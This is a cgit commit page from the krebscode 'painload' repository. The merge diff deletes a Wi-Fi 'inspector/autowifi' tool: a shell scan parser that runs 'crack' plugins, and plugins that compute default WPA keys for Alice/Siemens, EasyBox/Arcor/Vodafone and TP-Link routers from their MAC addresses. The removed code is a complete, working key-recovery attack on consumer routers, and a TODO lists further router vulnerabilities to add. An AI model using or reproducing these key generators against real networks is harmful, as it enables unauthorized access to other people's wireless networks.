summaryrefslogtreecommitdiffstats
path: root/recon/inspect_wifi
diff options
context:
space:
mode:
authormakefu <github@syntax-fehler.de>2014-12-25 21:15:01 +0100
committermakefu <github@syntax-fehler.de>2014-12-25 21:15:01 +0100
commitabd5b2c8f074ae26c2680048640c47e10566bd39 (patch)
tree9dbdc63edbababec6412992dabba84089117b472 /recon/inspect_wifi
parentc0f39b57888603595aa37d5abbdad0f52a525184 (diff)
parent8db6cecf6f088ebac98a6be15d920ab412a1c510 (diff)
Merge branch 'master' of ssh://github.com/krebscode/painload
everything stays the same in inspector_wifi Conflicts: recon/inspect_wifi/.gitignore recon/inspect_wifi/README.md recon/inspect_wifi/TODO recon/inspect_wifi/inspector_wifi recon/inspect_wifi/plugins/01open recon/inspect_wifi/plugins/02alice recon/inspect_wifi/plugins/02easybox recon/inspect_wifi/plugins/02tplink recon/inspect_wifi/plugins/plugin_core recon/inspector_wifi/.gitignore recon/inspector_wifi/README.md recon/inspector_wifi/TODO recon/inspector_wifi/inspector_wifi recon/inspector_wifi/plugins/01open recon/inspector_wifi/plugins/02alice recon/inspector_wifi/plugins/02easybox recon/inspector_wifi/plugins/02tplink recon/inspector_wifi/plugins/plugin_core recon/wifi_inspector/.gitignore recon/wifi_inspector/README.md recon/wifi_inspector/TODO recon/wifi_inspector/inspector_wifi recon/wifi_inspector/plugins/01open recon/wifi_inspector/plugins/02alice recon/wifi_inspector/plugins/02easybox recon/wifi_inspector/plugins/02tplink recon/wifi_inspector/plugins/plugin_core
Diffstat (limited to 'recon/inspect_wifi')
-rw-r--r--recon/inspect_wifi/.gitignore1
-rw-r--r--recon/inspect_wifi/README.md49
-rw-r--r--recon/inspect_wifi/TODO9
-rwxr-xr-xrecon/inspect_wifi/inspector_wifi75
-rwxr-xr-xrecon/inspect_wifi/plugins/01open6
-rwxr-xr-xrecon/inspect_wifi/plugins/02alice23
-rwxr-xr-xrecon/inspect_wifi/plugins/02easybox36
-rwxr-xr-xrecon/inspect_wifi/plugins/02tplink24
-rw-r--r--recon/inspect_wifi/plugins/plugin_core41
9 files changed, 0 insertions, 264 deletions
diff --git a/recon/inspect_wifi/.gitignore b/recon/inspect_wifi/.gitignore
deleted file mode 100644
index 05ba1603..00000000
--- a/recon/inspect_wifi/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-/etc/autowifi/wifi_keys
diff --git a/recon/inspect_wifi/README.md b/recon/inspect_wifi/README.md
deleted file mode 100644
index 3e0d8dce..00000000
--- a/recon/inspect_wifi/README.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# Autowifi
-Author: makefu,lassulus
-
-Status: Pre-Alpha - it will most likely break if you try to use it
-
-# Contact
-
-twitter: @krebsbob ,@makefoo
-
-IRC: freenode #krebs
-
-# Goals
-Goal of autowifi is to provide a tool which automatically can connect to
-networks in an unknown environment.
-
-This can either be done by connecting to open networks, known networks
-(whitelist) or by calculating weak default wpa keys (for example easybox
-default passwords).
-
-# Audience
-Due to the current status of the project the target audience are
-linux users with technical background .
-
-# Usage
-
- # all as root
- # try to find networks to connect to around you
- usr/bin/autowifi_dryrun quiet
-
- # start the autowifi daemon which tries to stay in networks all the time
- usr/bin/autowifi
-
-# Plugins
-All tests to open up networks are implemented in plugins in
- usr/lib/autowifi/plugins
-
-## Run a single Plugin
-This can be used for testing purposes, e.g. test a single plugin against given networks directly
-
- # try out the easybox keygen
- usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style)
-
- #e.g.
- usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]"
-
-# Disclaimer
-- use at own risk
-- only run in lab environment
-- you break it, you buy it
diff --git a/recon/inspect_wifi/TODO b/recon/inspect_wifi/TODO
deleted file mode 100644
index ddd59818..00000000
--- a/recon/inspect_wifi/TODO
+++ /dev/null
@@ -1,9 +0,0 @@
-more intelligent autoconnect (open first, encrypted second etc.)
- perform initial scan on startup of unscanned networks
- sort networks by bandwidth and connect
-profiles ala netcfg/netctl
-better profile hooks
-
-Implement:
- - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622
- - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt
diff --git a/recon/inspect_wifi/inspector_wifi b/recon/inspect_wifi/inspector_wifi
deleted file mode 100755
index 06f37ddb..00000000
--- a/recon/inspect_wifi/inspector_wifi
+++ /dev/null
@@ -1,75 +0,0 @@
-#!/bin/sh
-# Usage; sudo iwlist wlan0 scan | ./inspector_wifi
-#
-#
-set -eu
-
-cd "$(dirname "$(readlink -f "$0")")"
-echo "waiting for iwlist scan data..." >&2
-
-crack_wifi(){
- for i in plugins/*;do
- if RET=$(./$i "$@" 2>/dev/null);then
- echo "$@ - with crack $i succeeded - Key is $RET"
- fi
- done
-}
-
-shell_escape(){
- sed 's/./\\&/g'
-}
-remove_quotes(){
- sed 's/^"\|"$//g'
-}
-
-
-iwlist_scan_parser(){
- count=0
- while read line;
- do
- case "$line" in
-
- *"Cell "*)
- if [ $count -ne 0 ];then
- crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
- fi
- WPA=0
- WPA2=0
- : $((count+=1))
- MAC=${line#*Address: }
- ;;
- *Channel:*)
- CHANNEL=${line#*:}
- ;;
- *Quality=*)
- QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`"
- ;;
- *"Encryption key:"*)
- ENCRYPTION=${line#*key:}
- ;;
- *ESSID:*)
- ESSID=$(echo "${line#*ESSID:}" | remove_quotes)
- ;;
- *"IE: IEEE 802.11i/WPA2"*)
- WPA2=1
- ;;
- *"IE: WPA Version 1"*)
- WPA=1
- ;;
- *);; #important, do not delete!
- esac
- done;
- crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
- echo WIFI_COUNT=$count
-}
-
-wifi_init(){
- iwlist_scan_parser
-}
-
-loop_networks(){
- for i in `seq 1 $WIFI_COUNT`; do
- loop_over_cracks "$i"
- done
-}
-wifi_init
diff --git a/recon/inspect_wifi/plugins/01open b/recon/inspect_wifi/plugins/01open
deleted file mode 100755
index 881f47ea..00000000
--- a/recon/inspect_wifi/plugins/01open
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION
-if [ "$4" == "[ESS]" ]; then
- exit 0
-fi
-exit 1
diff --git a/recon/inspect_wifi/plugins/02alice b/recon/inspect_wifi/plugins/02alice
deleted file mode 100755
index f30acc3a..00000000
--- a/recon/inspect_wifi/plugins/02alice
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
-# Based on Poc from
-# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
-#
-#
-# ESSID MAC CHANNEL ENCRYPTION
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-if ! check_vendor_mac $VENDOR_MAC "00255E" ;then
- echo "$VENDOR_MAC not affected"
- exit 1
-fi
-
-# printf always makes string to lower, need that for correct md5sum
-ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
-TMP=$(printf $ETHMAC | md5sum)
-printf ${TMP:0:12} | base64
-exit 0
diff --git a/recon/inspect_wifi/plugins/02easybox b/recon/inspect_wifi/plugins/02easybox
deleted file mode 100755
index 58816f25..00000000
--- a/recon/inspect_wifi/plugins/02easybox
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-parse_plugin_args "$@"
-
-if ! echo "$ESSID" | grep -q '\(EasyBox-\|Arcor-\|Vodafone-\)'; then
- echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
- exit 1
-else
- # Fill up to 4 places with zeros, if necessary:
- deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
- #
- # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
- hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
- #echo 'M4 (Hex): ' ${hexi[@]}
- # K1 = last byte of (d0 + d1 + h2 + h3)
- # K2 = last byte of (h0 + h1 + d2 + d3)
- c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
- c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
- K1=$((($c1)%16))
- K2=$((($c2)%16))
- #printf "K1: %x\n" $K1
- #printf "K2: %x\n" $K2
- X1=$((K1^${deci:6:1}))
- X2=$((K1^${deci:4:1}))
- X3=$((K1^${deci:2:1}))
- Y1=$((K2^0x${hexi:2:1}))
- Y2=$((K2^0x${hexi:4:1}))
- Y3=$((K2^0x${hexi:6:1}))
- Z1=$((0x${hexi:4:1}^${deci:6:1}))
- Z2=$((0x${hexi:6:1}^${deci:4:1}))
- Z3=$((K1^K2))
- printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
-fi
diff --git a/recon/inspect_wifi/plugins/02tplink b/recon/inspect_wifi/plugins/02tplink
deleted file mode 100755
index 522c0845..00000000
--- a/recon/inspect_wifi/plugins/02tplink
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/sh
-# Implementation of TP-Link default WPA Key
-# Based on
-# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-if ! check_vendor_mac $VENDOR_MAC F8D111; then
- echo "$VENDOR_MAC not affected"
- exit 1
-fi
-
-if echo "$ESSID" | grep -q '^tp'; then
- echo "$ESSID not affected"
- exit 1
-fi
-
-
-# printf always makes string to lower, need that for correct md5sum
-printf "${MAC:4:12}"
-exit 0
diff --git a/recon/inspect_wifi/plugins/plugin_core b/recon/inspect_wifi/plugins/plugin_core
deleted file mode 100644
index e79a3c05..00000000
--- a/recon/inspect_wifi/plugins/plugin_core
+++ /dev/null
@@ -1,41 +0,0 @@
-#!/bin/sh
-parse_plugin_args(){
- [ $# -ne 4 ] && plugin_usage && exit 1
- # convenience function to put args in ENV variables
- ESSID="$1"
-
- # mac is returned without colon
- MAC=$(printf "%s" "$2" | sed 's/://g')
- # split up the mac address to vendor and private part
- VENDOR_MAC=${MAC:0:6}
- PRIVATE_MAC=${MAC:6:12}
- CHANNEL="$3"
- ENC="$4"
- if [ ${#MAC} -ne 12 ] ;then
- echo "MAC malformed"
- exit 1
- fi
-}
-plugin_usage(){
- cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC"
-
- ESSID - string
- MAC - 00:11:22:33:44:55
- CHANNEL - 4
- ENC - wpa
-EOF
-
-}
-
-check_vendor_mac(){
- needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
- shift
- for i in "$@";do
- [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
- done
- return 1
-}
-check_painmode(){
- test -z "${painmode:-}" && echo "painmode required" && exit 1
-}
generated by cgit v1.2.3 (git 2.25.1) at 2024-06-29 23:59:39 +0000